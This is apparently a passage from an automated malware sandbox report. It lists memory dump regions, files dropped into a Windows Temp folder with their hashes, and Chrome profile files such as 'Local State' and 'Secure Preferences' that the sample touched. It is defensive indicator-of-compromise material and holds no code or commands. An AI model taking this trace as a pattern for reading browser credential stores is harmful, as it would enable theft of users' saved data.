memory/4312-201-0x0000000005FE0000-0x0000000006012000-memory.dmp

memory/4312-202-0x000000006D120000-0x000000006D16C000-memory.dmp

memory/4312-212-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

memory/4312-213-0x00000000069F0000-0x0000000006A93000-memory.dmp

memory/4312-214-0x0000000007390000-0x0000000007A0A000-memory.dmp

memory/4312-215-0x0000000006D40000-0x0000000006D5A000-memory.dmp

memory/4312-218-0x0000000006DC0000-0x0000000006DCA000-memory.dmp

memory/4312-225-0x0000000006FB0000-0x0000000007046000-memory.dmp

memory/4312-226-0x0000000006F40000-0x0000000006F51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/4312-238-0x0000000006F70000-0x0000000006F7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh

MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

C:\Users\Admin\AppData\Local\Temp\ykifDQA.1

MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6

memory/4312-245-0x0000000006F80000-0x0000000006F94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

memory/4312-246-0x0000000007070000-0x000000000708A000-memory.dmp

memory/4312-247-0x0000000007060000-0x0000000007068000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pajqyzJ.o

MD5 394f820f75a9a6164a0ceff2db6037a1
SHA1 5843110d8ce5e27f0f3d7781151891bff9131664
SHA256 31a92c9d65ee868ca0b23ee616a590f3cd4ac22aef1846f33eda8abac4e8d007
SHA512 48ce7ee8114e126aa3f679f465bef64d062c88365607b1afe87cbb2faed88ec88109a2edcd610a72b937172d60668208cdf66fbfce640ffe25547294d1884b44

C:\Users\Admin\AppData\Local\Temp\NuWKoG5w.G

MD5 4d073e6b58b793121a7d814201c17aa8
SHA1 924c01c515cdfb2c89948519113db84f272fb1b8
SHA256 b36d1359231ad7ad5d9bbcb908e2547c50d6bc724ac1e0b4a1da315752823a06
SHA512 4ea6a32bc7c23398e72108e3fe22475eb541777defdebf541f8a1b0a20a79891b8d8b9bb361affd14488d5f9d42f8eb949c0e385958da9b203839440813c3cd1

C:\Users\Admin\AppData\Local\Temp\r4QR.jT

MD5 76feb18542f67783d686844db2af774e
SHA1 cb357382794a2c94164bbc5d66d44b9df2a2dfde
SHA256 15c4c2cd4de128df1d74f75f20642525c3bdcb86b736b3245465e59fb4b4ae37
SHA512 5d9faff45e1ef8c1f696d738e3966200d9ad015faabb367e82614378523eeab6f961486c10d666728d584423599f45373a0eaa51d0eb0c16d5d264c459625a68

C:\Users\Admin\AppData\Local\Temp\6qI2.~

MD5 011222e0e0555611691f883cad704b34
SHA1 9b4aa634a37ac667fe469d6e17c4b352b2be9b8b
SHA256 c32f5a6afac55310970e9424aad39dafba5df6ffa3c606c9c406384993849db4
SHA512 07c6116e25a1e53d212cbb127716cc4b5db36adec8d7eb279d13b11705fedcd4fcf10ff78ccda7d29b49d929123e86fd65944931e8c369db5cfc2af51bf2eec5

C:\Users\Admin\AppData\Local\Temp\R6f7sE.I

MD5 bd3523387b577979a0d86ff911f97f8b
SHA1 1f90298142a27ec55118317ee63609664bcecb45
SHA256 a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36
SHA512 b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286

memory/4388-267-0x0000000002620000-0x0000000002849000-memory.dmp

memory/4168-271-0x0000000000400000-0x00000000016D5000-memory.dmp

memory/1632-272-0x0000000000400000-0x00000000016E0000-memory.dmp

memory/4664-284-0x0000000000400000-0x0000000000414000-memory.dmp

memory/768-285-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1232-286-0x0000000003480000-0x0000000003525000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

memory/1232-292-0x0000000003530000-0x00000000035C2000-memory.dmp

memory/1232-295-0x0000000003530000-0x00000000035C2000-memory.dmp

memory/4388-299-0x0000000002620000-0x0000000002849000-memory.dmp

memory/1232-298-0x0000000000400000-0x000000000054C000-memory.dmp

memory/4168-296-0x0000000000400000-0x00000000016D5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

memory/4388-334-0x0000000002D30000-0x0000000002DD8000-memory.dmp

memory/4388-335-0x0000000002DF0000-0x0000000002E85000-memory.dmp

memory/4388-340-0x0000000002DF0000-0x0000000002E85000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
